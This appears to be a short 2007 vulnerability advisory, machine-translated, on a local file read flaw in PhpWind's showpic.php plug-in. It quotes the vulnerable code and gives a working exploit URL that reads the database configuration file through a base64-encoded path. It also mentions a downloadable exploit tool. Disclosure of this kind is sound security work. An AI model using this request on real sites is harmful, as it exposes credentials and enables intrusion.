PhpWind anti-theft chain plug-in Showpic. php local file read vulnerability-vulnerability warning-the black bar safety net

2007-05-14T00:00:00
ID MYHACK58:62200715440
Type myhack58
Reporter 佚名
Modified 2007-05-14T00:00:00

Description

Vulnerability file: showpic.php

str=$_SERVER['QUERY_STRING']; $img=base64_decode($str); $codelen=strlen($safeguard);//get the additional code length $img=substr($img,$codelen); //remove the additional code readfile($img);

Submitted parameters are base64 encoded directly using readfile to read the file,so you can put the path to the base64 encoded submitted,to read out the contents of the file

Exploit way:

<http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==>

Then view the source files.

Here ZGF0YS9zcWxfY29uZmlnLnBocA== is the path to the data/sql_config. php BASE64 encoded. You can also be changed to other path of the file. BASE64 encoding you can see the contents of the file.

Elf written using the tool: ! Download address:! [](/Article/UploadPic/2007-5/20075140422114.gif) PW_showpic.rar